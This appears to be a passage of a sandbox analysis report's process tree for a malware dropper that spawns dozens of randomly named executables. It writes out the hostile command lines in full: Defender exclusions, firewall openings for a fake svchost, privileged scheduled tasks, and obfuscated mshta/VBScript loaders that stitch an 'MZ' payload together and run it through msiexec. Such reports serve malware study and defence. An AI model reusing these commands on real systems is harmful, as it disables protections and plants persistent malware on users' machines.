PID:1656

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
3⤵
- Creates scheduled task(s)
PID:6548

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
3⤵
- Creates scheduled task(s)
PID:6540

C:\Users\Admin\Documents\T2UiPt34sglBDN9PkMPgGQ56.exe
"C:\Users\Admin\Documents\T2UiPt34sglBDN9PkMPgGQ56.exe"
3⤵
- Executes dropped EXE
PID:6524

C:\Users\Admin\Pictures\Adobe Films\y9_luMJjfyhqSStaRQoTk8V0.exe
"C:\Users\Admin\Pictures\Adobe Films\y9_luMJjfyhqSStaRQoTk8V0.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:744

C:\Users\Admin\Pictures\Adobe Films\geOjkJ0mVcduzvKZWwFgVYyf.exe
"C:\Users\Admin\Pictures\Adobe Films\geOjkJ0mVcduzvKZWwFgVYyf.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2896

C:\Users\Admin\Pictures\Adobe Films\bjyRnujXh1haC_5HICHJri7j.exe
"C:\Users\Admin\Pictures\Adobe Films\bjyRnujXh1haC_5HICHJri7j.exe"
2⤵
PID:2856

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
3⤵
PID:5340

C:\Windows\System32\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
3⤵
PID:5828

C:\Windows\System32\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
3⤵
PID:5880

C:\Windows\SYSTEM32\schtasks.exe
schtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM
3⤵
- Creates scheduled task(s)
PID:6684

C:\Windows\System\svchost.exe
"C:\Windows\System\svchost.exe" formal
3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:6780

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
4⤵
PID:7872

C:\Windows\System32\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
4⤵
PID:8152

C:\Windows\System32\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
4⤵
PID:6672

C:\Users\Admin\Pictures\Adobe Films\mqSrAqHFMGt7EAO9C4kKycar.exe
"C:\Users\Admin\Pictures\Adobe Films\mqSrAqHFMGt7EAO9C4kKycar.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1928

C:\Users\Admin\Pictures\Adobe Films\B1cQEjfN5wvIYW9wsbF3Mipy.exe
"C:\Users\Admin\Pictures\Adobe Films\B1cQEjfN5wvIYW9wsbF3Mipy.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3972

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
3⤵
PID:7680

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
4⤵
- Kills process with taskkill
PID:7140

C:\Users\Admin\Pictures\Adobe Films\BVmvoWdUrHGF9M0d_Eo5ELvM.exe
"C:\Users\Admin\Pictures\Adobe Films\BVmvoWdUrHGF9M0d_Eo5ELvM.exe"
2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:3424

C:\Program Files (x86)\Company\NewProduct\cutm3.exe
"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4604

C:\Program Files (x86)\Company\NewProduct\inst3.exe
"C:\Program Files (x86)\Company\NewProduct\inst3.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4708

C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe
"C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"
3⤵
- Executes dropped EXE
PID:4636

C:\Users\Admin\Pictures\Adobe Films\R6FvEeAMzuG1FGXNrudfSjbH.exe
"C:\Users\Admin\Pictures\Adobe Films\R6FvEeAMzuG1FGXNrudfSjbH.exe"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3952

C:\Users\Admin\Pictures\Adobe Films\MfR5P3jtbVt2lnIZPTc_I1w1.exe
"C:\Users\Admin\Pictures\Adobe Films\MfR5P3jtbVt2lnIZPTc_I1w1.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
PID:3576

C:\Users\Admin\Pictures\Adobe Films\MfR5P3jtbVt2lnIZPTc_I1w1.exe
"C:\Users\Admin\Pictures\Adobe Films\MfR5P3jtbVt2lnIZPTc_I1w1.exe"
3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:5268

C:\Users\Admin\Pictures\Adobe Films\y_QaUUThIYKqSe5cUViDSYMb.exe
"C:\Users\Admin\Pictures\Adobe Films\y_QaUUThIYKqSe5cUViDSYMb.exe"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3720

C:\Users\Admin\Pictures\Adobe Films\oDgBhLX9H2wUXa4t35viNJ5_.exe
"C:\Users\Admin\Pictures\Adobe Films\oDgBhLX9H2wUXa4t35viNJ5_.exe"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2900

C:\Users\Admin\Pictures\Adobe Films\YEB_JgasjnRYhFUnFKmSY0AB.exe
"C:\Users\Admin\Pictures\Adobe Films\YEB_JgasjnRYhFUnFKmSY0AB.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2412

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2412 -s 660
3⤵
- Program crash
PID:5752

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2412 -s 672
3⤵
- Program crash
PID:5200

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2412 -s 708
3⤵
- Program crash
PID:6504

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2412 -s 708
3⤵
- Program crash
PID:6920

C:\Users\Admin\Pictures\Adobe Films\USAUkIeyEMXxC37_VirxwDso.exe
"C:\Users\Admin\Pictures\Adobe Films\USAUkIeyEMXxC37_VirxwDso.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4044

C:\Users\Admin\Pictures\Adobe Films\USAUkIeyEMXxC37_VirxwDso.exe
"C:\Users\Admin\Pictures\Adobe Films\USAUkIeyEMXxC37_VirxwDso.exe"
3⤵
PID:4776

C:\Users\Admin\Pictures\Adobe Films\ypFHd8JXVHsHFi1sHWSBSDc8.exe
"C:\Users\Admin\Pictures\Adobe Films\ypFHd8JXVHsHFi1sHWSBSDc8.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3508

C:\Users\Admin\Pictures\Adobe Films\WsKBEzuxaPjQpYj11ghzQynd.exe
"C:\Users\Admin\Pictures\Adobe Films\WsKBEzuxaPjQpYj11ghzQynd.exe"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2656

C:\Users\Admin\Pictures\Adobe Films\fzUe5uYYwWRli9uqh43zt8g5.exe
"C:\Users\Admin\Pictures\Adobe Films\fzUe5uYYwWRli9uqh43zt8g5.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1724

C:\Users\Admin\Pictures\Adobe Films\fzUe5uYYwWRli9uqh43zt8g5.exe
"C:\Users\Admin\Pictures\Adobe Films\fzUe5uYYwWRli9uqh43zt8g5.exe"
3⤵
- Executes dropped EXE
PID:5980

C:\Users\Admin\Pictures\Adobe Films\fzUe5uYYwWRli9uqh43zt8g5.exe
"C:\Users\Admin\Pictures\Adobe Films\fzUe5uYYwWRli9uqh43zt8g5.exe"
3⤵
PID:6252

C:\Users\Admin\AppData\Local\Temp\Altingiaceae.exe
"C:\Users\Admin\AppData\Local\Temp\Altingiaceae.exe"
4⤵
PID:5600

C:\Users\Admin\Pictures\Adobe Films\yn9mbhlnOvWHCn46u7SFsmoE.exe
"C:\Users\Admin\Pictures\Adobe Films\yn9mbhlnOvWHCn46u7SFsmoE.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5152

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbsCript: clOse ( CrEATeObJeCt ( "WscrIpT.sHELl" ). rUn ( "cmd /Q /C copy /y ""C:\Users\Admin\Pictures\Adobe Films\yn9mbhlnOvWHCn46u7SFsmoE.exe"" ..\z1HFJkPKWMLYRf.EXE && StArt ..\Z1hFJKPKWMLYRf.eXE -pVmK5OY1Q2FwiV3_NJROp~tX8k & IF """" == """" for %s iN ( ""C:\Users\Admin\Pictures\Adobe Films\yn9mbhlnOvWHCn46u7SFsmoE.exe"" ) do taskkill /Im ""%~Nxs"" -f " , 0,TRUE) )
3⤵
PID:5616

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /C copy /y "C:\Users\Admin\Pictures\Adobe Films\yn9mbhlnOvWHCn46u7SFsmoE.exe" ..\z1HFJkPKWMLYRf.EXE&& StArt ..\Z1hFJKPKWMLYRf.eXE -pVmK5OY1Q2FwiV3_NJROp~tX8k &IF "" == "" for %s iN ( "C:\Users\Admin\Pictures\Adobe Films\yn9mbhlnOvWHCn46u7SFsmoE.exe" ) do taskkill /Im "%~Nxs" -f
4⤵
PID:1884

C:\Users\Admin\AppData\Local\Temp\z1HFJkPKWMLYRf.EXE
..\Z1hFJKPKWMLYRf.eXE -pVmK5OY1Q2FwiV3_NJROp~tX8k
5⤵
PID:7164

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbsCript: clOse ( CrEATeObJeCt ( "WscrIpT.sHELl" ). rUn ( "cmd /Q /C copy /y ""C:\Users\Admin\AppData\Local\Temp\z1HFJkPKWMLYRf.EXE"" ..\z1HFJkPKWMLYRf.EXE && StArt ..\Z1hFJKPKWMLYRf.eXE -pVmK5OY1Q2FwiV3_NJROp~tX8k & IF ""-pVmK5OY1Q2FwiV3_NJROp~tX8k "" == """" for %s iN ( ""C:\Users\Admin\AppData\Local\Temp\z1HFJkPKWMLYRf.EXE"" ) do taskkill /Im ""%~Nxs"" -f " , 0,TRUE) )
6⤵
PID:2588

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /C copy /y "C:\Users\Admin\AppData\Local\Temp\z1HFJkPKWMLYRf.EXE" ..\z1HFJkPKWMLYRf.EXE&& StArt ..\Z1hFJKPKWMLYRf.eXE -pVmK5OY1Q2FwiV3_NJROp~tX8k &IF "-pVmK5OY1Q2FwiV3_NJROp~tX8k " == "" for %s iN ( "C:\Users\Admin\AppData\Local\Temp\z1HFJkPKWMLYRf.EXE" ) do taskkill /Im "%~Nxs" -f
7⤵
PID:2188

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBsCrIpt: closE ( crEateOBjECT ("WsCRipT.sHELl" ).ruN( "cmD.Exe /r EchO | SEt /P = ""MZ"" > OoZ39QP7.Q~P &cOPy /Y /b OOZ39QP7.q~P + 3_PI.f2x +6TWz8s9B.~T +TiRWH.Ql +FFUU.A1+ YZA~WMAU.H+ FDHTx.pBB + V16YA.kU ..\WGKZNZ9t.jOX & StArT msiexec.exe -y ..\WgKZNZ9T.JOX & deL /Q * " ,0 , TRUE ) )
6⤵
PID:4580

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /r EchO | SEt /P = "MZ" > OoZ39QP7.Q~P &cOPy /Y /b OOZ39QP7.q~P + 3_PI.f2x +6TWz8s9B.~T +TiRWH.Ql +FFUU.A1+ YZA~WMAU.H+ FDHTx.pBB+ V16YA.kU ..\WGKZNZ9t.jOX & StArT msiexec.exe -y ..\WgKZNZ9T.JOX & deL /Q *
7⤵
PID:2192

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" EchO "
8⤵
PID:1896

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" SEt /P = "MZ" 1>OoZ39QP7.Q~P"
8⤵
- Executes dropped EXE
PID:6388

C:\Windows\SysWOW64\msiexec.exe
msiexec.exe -y ..\WgKZNZ9T.JOX
8⤵
- Loads dropped DLL
PID:10236

C:\Windows\SysWOW64\taskkill.exe
taskkill /Im "yn9mbhlnOvWHCn46u7SFsmoE.exe" -f
5⤵
- Kills process with taskkill
PID:1308

C:\Users\Admin\Pictures\Adobe Films\uZmNdfvWT3RkIquatA1l7mtE.exe
"C:\Users\Admin\Pictures\Adobe Films\uZmNdfvWT3RkIquatA1l7mtE.exe"
2⤵
PID:5228

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\uZmNdfvWT3RkIquatA1l7mtE.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\uZmNdfvWT3RkIquatA1l7mtE.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
3⤵
PID:5332

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\uZmNdfvWT3RkIquatA1l7mtE.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\uZmNdfvWT3RkIquatA1l7mtE.exe" ) do taskkill -im "%~NxK" -F
4⤵
PID:6416

C:\Users\Admin\AppData\Local\Temp\8pWB.eXE
8pWB.eXe /pO_wtib1KE0hzl7U9_CYP
5⤵
PID:3544

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
6⤵
PID:6664

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ("WSCRIPt.SheLl" ). rUn ("C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl + _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " ,0 , TruE ) )
6⤵
PID:4432

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl+ _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY
7⤵
PID:2184

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" EcHO "
8⤵
PID:8484

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"
8⤵
PID:9128

C:\Windows\SysWOW64\msiexec.exe
msiexec.exe -y .\N3V4H8H.SXY
8⤵
- Loads dropped DLL
PID:7860

C:\Windows\SysWOW64\taskkill.exe
taskkill -im "uZmNdfvWT3RkIquatA1l7mtE.exe" -F
5⤵
- Kills process with taskkill
PID:6536

C:\Users\Admin\Pictures\Adobe Films\b94cV6KOavGXOWpZ1FiI6sCb.exe
"C:\Users\Admin\Pictures\Adobe Films\b94cV6KOavGXOWpZ1FiI6sCb.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:5316

C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
3⤵
- Loads dropped DLL
- Adds Run key to start application
PID:3640

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--XpjC5"
4⤵
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:8548

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1f8,0x1fc,0x200,0x1f4,0x204,0x7ffdef52dec0,0x7ffdef52ded0,0x7ffdef52dee0
5⤵
- Loads dropped DLL
PID:7832

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1700,512384495088799449,6841119979766981730,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8548_1276316795" --mojo-platform-channel-handle=1788 /prefetch:8
5⤵
PID:7540

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1700,512384495088799449,6841119979766981730,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8548_1276316795" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1712 /prefetch:2
5⤵
- Loads dropped DLL
PID:9924

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1700,512384495088799449,6841119979766981730,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8548_1276316795" --mojo-platform-channel-handle=2268 /prefetch:8
5⤵
PID:9916

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1700,512384495088799449,6841119979766981730,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8548_1276316795" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2624 /prefetch:1
5⤵
- Checks computer location settings
- Loads dropped DLL
PID:4848

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1700,512384495088799449,6841119979766981730,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8548_1276316795" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --mojo-platform-channel-handle=2608 /prefetch:1
5⤵
PID:4484

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1700,512384495088799449,6841119979766981730,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8548_1276316795" --mojo-platform-channel-handle=2928 /prefetch:8
5⤵
- Loads dropped DLL
PID:4304

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1700,512384495088799449,6841119979766981730,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8548_1276316795" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3280 /prefetch:2
5⤵
PID:10396

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1700,512384495088799449,6841119979766981730,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8548_1276316795" --mojo-platform-channel-handle=3772 /prefetch:8
5⤵
PID:6568

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1700,512384495088799449,6841119979766981730,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8548_1276316795" --mojo-platform-channel-handle=3832 /prefetch:8
5⤵
PID:9296

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1700,512384495088799449,6841119979766981730,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8548_1276316795" --mojo-platform-channel-handle=3744 /prefetch:8
5⤵
PID:10324

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1700,512384495088799449,6841119979766981730,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8548_1276316795" --mojo-platform-channel-handle=3608 /prefetch:8
5⤵
PID:5300

C:\Users\Admin\Desktop\setup_x86_x64_install.exe
"C:\Users\Admin\Desktop\setup_x86_x64_install.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:644

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3440

C:\Users\Admin\AppData\Local\Temp\7zS07DE1F07\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS07DE1F07\setup_install.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3060

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
4⤵
PID:1600

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
5⤵
PID:1780

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue130c270d23c79.exe
4⤵
PID:3940

C:\Users\Admin\AppData\Local\Temp\7zS07DE1F07\Tue130c270d23c79.exe
Tue130c270d23c79.exe
5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:708

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 708 -s 492
6⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Drops file in Windows directory
- Program crash
PID:5724

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue13c1be0d8f62bc.exe
4⤵
PID:676

C:\Users\Admin\AppData\Local\Temp\7zS07DE1F07\Tue13c1be0d8f62bc.exe
Tue13c1be0d8f62bc.exe
5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4228

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue132b1547125d9.exe
4⤵
PID:4148

C:\Users\Admin\AppData\Local\Temp\7zS07DE1F07\Tue132b1547125d9.exe
Tue132b1547125d9.exe
5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4240

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue13bbed6e0bb6.exe
4⤵
PID:648

C:\Users\Admin\AppData\Local\Temp\7zS07DE1F07\Tue13bbed6e0bb6.exe
Tue13bbed6e0bb6.exe
5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4584

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue13d68628efddb1.exe
4⤵
PID:4188

C:\Users\Admin\AppData\Local\Temp\7zS07DE1F07\Tue13d68628efddb1.exe
Tue13d68628efddb1.exe
5⤵
- Executes dropped EXE
- Checks computer location settings
PID:4740

C:\Users\Admin\Pictures\Adobe Films\1IAIIOHlOD8MooCIUzBGmPm6.exe
"C:\Users\Admin\Pictures\Adobe Films\1IAIIOHlOD8MooCIUzBGmPm6.exe"
6⤵
PID:7040

C:\Users\Admin\Pictures\Adobe Films\WFs2R34gCIfKUZ61dr3jvV2X.exe
"C:\Users\Admin\Pictures\Adobe Films\WFs2R34gCIfKUZ61dr3jvV2X.exe"
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:2856

C:\Users\Admin\Pictures\Adobe Films\8c7AOkmXVdatkeJ_O43dbF51.exe
"C:\Users\Admin\Pictures\Adobe Films\8c7AOkmXVdatkeJ_O43dbF51.exe"
6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
